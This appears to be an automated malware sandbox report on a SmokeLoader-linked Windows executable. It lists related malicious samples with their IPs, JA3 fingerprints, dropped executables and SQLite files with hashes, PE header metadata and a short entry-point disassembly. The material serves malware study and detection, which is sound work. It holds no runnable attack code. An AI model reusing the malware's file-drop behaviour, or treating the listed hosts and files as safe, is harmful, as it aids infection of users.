	mdfh8nJQAy.elf	Get hash	malicious	Mirai, Moobot	Browse	181.85.133.111
CableOndaPA	SecuriteInfo.com.Linux.Siggen.9999.18891.22819.elf	Get hash	malicious	Unknown	Browse	190.140.175.36
	file.exe	Get hash	malicious	SmokeLoader	Browse	190.218.32.149
	file.exe	Get hash	malicious	SmokeLoader	Browse	190.218.32.149
	file.exe	Get hash	malicious	SmokeLoader	Browse	190.218.32.149
	mirai.dbg.elf	Get hash	malicious	Mirai	Browse	181.197.131.94
	file.exe	Get hash	malicious	SmokeLoader	Browse	190.57.36.33
	xd.arm7.elf	Get hash	malicious	Mirai	Browse	181.197.94.18
	arm.elf	Get hash	malicious	Mirai	Browse	190.141.69.11
	xd.x86.elf	Get hash	malicious	Mirai	Browse	200.46.97.74
	Zd07ab7Th7.elf	Get hash	malicious	Mirai	Browse	190.141.21.53
SURFAIRWIRELESS-IN-01US	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	YPDi0gRMHU.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
SURFAIRWIRELESS-IN-01US	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	YPDi0gRMHU.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
72a589da586844d7f0818ce684948eea	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Get hash	malicious	Metasploit	Browse	23.145.40.164
	SecuriteInfo.com.Win64.Evo-gen.19321.5552.exe	Get hash	malicious	Unknown	Browse	23.145.40.164
	SecuriteInfo.com.Win64.MalwareX-gen.15798.11018.exe	Get hash	malicious	Metasploit	Browse	23.145.40.164
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
a0e9f5d64349fb13191bc781f81f42e1	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	kUiqbpzmbo.exe	Get hash	malicious	XWorm	Browse	23.145.40.162
	C5Nbn7P6GJ.exe	Get hash	malicious	XRed, XWorm	Browse	23.145.40.162
	Setup.exe	Get hash	malicious	LummaC, MicroClip	Browse	23.145.40.162
	66fb252fe232b_Patksl.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	23.145.40.162
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	23.145.40.162
	lFsYXvJPWw.exe	Get hash	malicious	XRed	Browse	23.145.40.162
	Applicati#U043enSetupFile14.1.exe	Get hash	malicious	LummaC	Browse	23.145.40.162

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\451E.exe	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\451E.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	modified
Size (bytes):	78336
Entropy (8bit):	6.401797003857336
Encrypted:	false
SSDEEP:	1536:qLGRHFXEMV8cTemFnItAeiU5MSOMRSIXD4k:qGiTiU5MjeVx
MD5:	69C7186C5393D5E94294E39DA1D4D830
SHA1:	7681B66FBDE2FA796A2129B54F1F3BFA0E025133
SHA-256:	1B0BE4B4B45A52650502425ABBBA226CBF0CCE5959F7A178189AE9AD79AB6911
SHA-512:	000691E25AA193B9C5D53EF896524306D74D3DD815A5C335426ABC143DE6BB594BEDF075C0A85925D824F09755B94C7B250F878F93F580302C0E84C137919FCF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Joe Sandbox View:	Filename: 0k3ibTiMjy.exe, Detection: malicious, Browse Filename: qg5Ddf4an9.exe, Detection: malicious, Browse Filename: aZPm0tHPTX.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v....................................b......b......b......Rich............PE..d...^..f.........."..........>.................@.............................p............`..................................................(...............P...............`.......................................................................................text............................... ..`.rdata...&.......(..................@..@.data...h....@......................@....pdata.......P......."..............@..@.reloc.......`.......0..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9AAA.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9AAA.tmp-shm

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9E35.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\A115.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\A481.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\A4FF.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\A5FA.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\A6F5.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\C35.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	245248
Entropy (8bit):	6.265477305049663
Encrypted:	false
SSDEEP:	3072:NLzPcSaqbXVsMbsf1a94qeJ6zcsj+95iOx8pljfpyll/B3:NLzUSaqbXQf1CPeJ6zhO23Vylr
MD5:	31B228301D6FB368186C2D025311D1AF
SHA1:	59DDAC2CBC17D0BC6AFF53667B95857DD8640BF6
SHA-256:	1688FD4288AD38DB8CAE190B096586762628ACE0D0CF6FBA83A060E802D374BA
SHA-512:	A26B6C8A5D1C4ACCCCECE6A1618F7714AC7178B7A3B68A18B5B6B0527C3859EDDCDCB0E18ADB69D5B5908077B2AD28DC046DBC4912AFCDBCE671EEB7046FB72D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.iz>..)>..)>..)...)?..) ..)#..) ..)-..) ..)T..)..\|)9..)>..)I..) ..)?..) ..)?..) ..)?..)Rich>..)................PE..L.....5d............................/.............@.................................o.......................................\...P....................................................................................................................text............................... ..`.rdata...!......."..................@..@.data...............................@....sazabah\|...........................@....tls................................@....kisuva.............................@....rsrc...............................@..@........................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\bsjhhuh

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	245760
Entropy (8bit):	6.267822670469737
Encrypted:	false
SSDEEP:	3072:RLzPcSAOVRt3J2XspmXG87Fj+95LOx8pljfo0l/B3:RLzUSAMt2XyO23M0r
MD5:	C108169F00FF9C5AD6FA70DF9137E44A
SHA1:	1ACFE826A57CDD04016324BCADAA6C7CD273B1F7
SHA-256:	5C86632A8EF4E46497B06979B965000700A51A2E1FDCF2BED91FF9C5B963A179
SHA-512:	7702CFBB2DEC4A8F9D7F7AAF3B152E9D33CD764E39D99E03273B719EA7F6B2EBAE219A3D549E86A9F7B6DBA15E505D22D69A4E7288834B59F7F8450A57A8F392
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.iz>..)>..)>..)...)?..) ..)#..) ..)-..) ..)T..)..\|)9..)>..)I..) ..)?..) ..)?..) ..)?..)Rich>..)................PE..L.....5d............................/.............@.........................................................................\...P....................................................................................................................text.............................. ..`.rdata...!......."..................@..@.data...............................@....ruyohel\|...........................@....tls................................@....rihogi.............................@....rsrc...............................@..@........................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\bsjhhuh:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\vejhhuh

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	245248
Entropy (8bit):	6.265477305049663
Encrypted:	false
SSDEEP:	3072:NLzPcSaqbXVsMbsf1a94qeJ6zcsj+95iOx8pljfpyll/B3:NLzUSaqbXQf1CPeJ6zhO23Vylr
MD5:	31B228301D6FB368186C2D025311D1AF
SHA1:	59DDAC2CBC17D0BC6AFF53667B95857DD8640BF6
SHA-256:	1688FD4288AD38DB8CAE190B096586762628ACE0D0CF6FBA83A060E802D374BA
SHA-512:	A26B6C8A5D1C4ACCCCECE6A1618F7714AC7178B7A3B68A18B5B6B0527C3859EDDCDCB0E18ADB69D5B5908077B2AD28DC046DBC4912AFCDBCE671EEB7046FB72D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.iz>..)>..)>..)...)?..) ..)#..) ..)-..) ..)T..)..\|)9..)>..)I..) ..)?..) ..)?..) ..)?..)Rich>..)................PE..L.....5d............................/.............@.................................o.......................................\...P....................................................................................................................text............................... ..`.rdata...!......."..................@..@.data...............................@....sazabah\|...........................@....tls................................@....kisuva.............................@....rsrc...............................@..@........................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\vssdihe

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	290443
Entropy (8bit):	7.99935187241868
Encrypted:	true
SSDEEP:	6144:Y12czOBf3qPyA/SUR0bhZ3piTqqq/Ec2kPE1fBFLEEIGvnvoCsp:Y1Dz+aPyA/SZbkTqB/AmWfBWB4h4
MD5:	20F06FE15A305DB0CCA7F2446B67A5EB
SHA1:	B657FEA45DEB765DEC525A999C83332387682CA4
SHA-256:	E2FC3C0ACF88303DB4A5B97CEA44302D24841E68A654C6DB453F02059A14D3EB
SHA-512:	FA82105811C3557D1A84429D14CA3FEBF4D7E7857898706D0A5C2C46336E2737000C651684CB4964D18614701DF8DA0434881DB4D95789210D8DACFBA9581FD4
Malicious:	false
Preview:	........,..2m..=]..<.mX......;.$..>r......Y..\).......4.3.-..."........$...9/...4.:..n.5zaK]R.'...l.k..e\|Z.....v.c*}w....%A.;,.2...R"Mg...\|.@zZ...#..c{E..8.\|..e..N...Cu:a.Yp.db..R+.io..:\a,.:.....pRe..n..."A....I.,.q?.X......-.k.s.'...[{.....$~j(.<../K..Pj;.5sd5...{........!`..Q.r.4..F....r......#.a!.M.....Qb.X..m.........O..,.........h^I....i...n.o.......>..s...D...@......'. .pT.J........3...xp...R......=....t...=..%..M...^0....>.I.8..(.d).I."............F..H.:...(....C'....rRT.5.7.W.........../7....j0.....D...].].8P.#.......'...y.Y...V.J..Y!.,..,.... .;.[h.P.^....Ny...x5O4....@.F...T.n.]..........D...N..Q,N.m...i.#...ss...i...Ze\|.3.N.v...'.H..H.CHC.Q).{VH...D.....p.....Ok_.\|m.b.......w6....'.z._..Q..../H..b..........).:.S...X.Z....-&....c....R....l......i.5/o@cJp......>....v>..h....m9...Kt.f..fso#..b@). .... .~..5.}2...~.7O..1.=...'.......7.&.Wf.....u.;.".(...9....qy...........T..l`.j.....w.s&....w^.>q.4...!.;.\|..~.`.....v

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.267822670469737
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	v173TV3V11.exe
File size:	245'760 bytes
MD5:	c108169f00ff9c5ad6fa70df9137e44a
SHA1:	1acfe826a57cdd04016324bcadaa6c7cd273b1f7
SHA256:	5c86632a8ef4e46497b06979b965000700a51a2e1fdcf2bed91ff9c5b963a179
SHA512:	7702cfbb2dec4a8f9d7f7aaf3b152e9d33cd764e39d99e03273b719ea7f6b2ebae219a3d549e86a9f7b6dba15e505d22d69a4e7288834b59f7f8450a57a8f392
SSDEEP:	3072:RLzPcSAOVRt3J2XspmXG87Fj+95LOx8pljfo0l/B3:RLzUSAMt2XyO23M0r
TLSH:	B2344B9179F0C227EFB74B314A70DAA45937BCA2AB70A19E3150B61F1A333B1B911357
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.iz>..)>..)>..)...)?..) ..)#..) ..)-..) ..)T..)..\|)9..)>..)I..) ..)?..) ..)?..) ..)?..)Rich>..)................PE..L.....5d...

File Icon


Icon Hash:	17694cb2b24d2117

Static PE Info

General

Entrypoint:	0x40182f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6435C6E3 [Tue Apr 11 20:45:23 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	5e541f0ed19da8c67474afeab35f1a51

Entrypoint Preview

Instruction
call 00007F053523045Ch
jmp 00007F053522C53Eh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0041FB08h], eax
mov dword ptr [0041FB04h], ecx
mov dword ptr [0041FB00h], edx
mov dword ptr [0041FAFCh], ebx
mov dword ptr [0041FAF8h], esi
mov dword ptr [0041FAF4h], edi
mov word ptr [0041FB20h], ss
mov word ptr [0041FB14h], cs
mov word ptr [0041FAF0h], ds
mov word ptr [0041FAECh], es
mov word ptr [0041FAE8h], fs
mov word ptr [0041FAE4h], gs
pushfd
pop dword ptr [0041FB18h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0041FB0Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0041FB10h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0041FB1Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0041FA58h], 00010001h
mov eax, dword ptr [0041FB10h]
mov dword ptr [0041FA0Ch], eax
mov dword ptr [0041FA00h], C0000409h
mov dword ptr [0041FA04h], 00000001h
mov eax, dword ptr [0041E008h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0041E00Ch]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000D0h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1c85c	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x11b000	0x1def0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x1c488	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1b000	0x1a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x193cf	0x19400	8d95907f8b9395a69c809ab7d99ce1c9	False	0.7846341274752475	data	7.463605198956065	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1b000	0x21e2	0x2200	b9571ef10137704c48bf54f76c2f1908	False	0.36960018382352944	data	5.568963977856118	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1e000	0xf9298	0x1a00	39b06b99939919014d4d1e31861e5a45	False	0.24323918269230768	data	2.5259560682729396	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ruyohel	0x118000	0x7c	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x119000	0x51d	0x600	53e979547d8c2ea86560ac45de08ae25	False	0.013020833333333334	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rihogi	0x11a000	0x400	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x11b000	0x1def0	0x1e000	5cefed6a88213e7e6d656ea4676fd3d9	False	0.4099039713541667	data	4.992130300436512	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AFX_DIALOG_LAYOUT	0x12de08	0x2	data			5.0
BAJOMIZINIXAPENEKIPOHOGAMIPACEF	0x12da08	0x3fa	ASCII text, with very long lines (1018), with no line terminators	Turkish	Turkey	0.6296660117878192
VOWEFUHAVAXEHARASIDIXERASANA	0x12ce10	0xbf7	ASCII text, with very long lines (3063), with no line terminators	Turkish	Turkey	0.5977799542931767
RT_CURSOR	0x12de10	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x12df40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_CURSOR	0x130510	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.31023454157782515
RT_CURSOR	0x1313d0	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x131500	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_ICON	0x11bb20	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.5706289978678039
RT_ICON	0x11c9c8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.6466606498194946
RT_ICON	0x11d270	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.6941244239631337
RT_ICON	0x11d938	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.7536127167630058
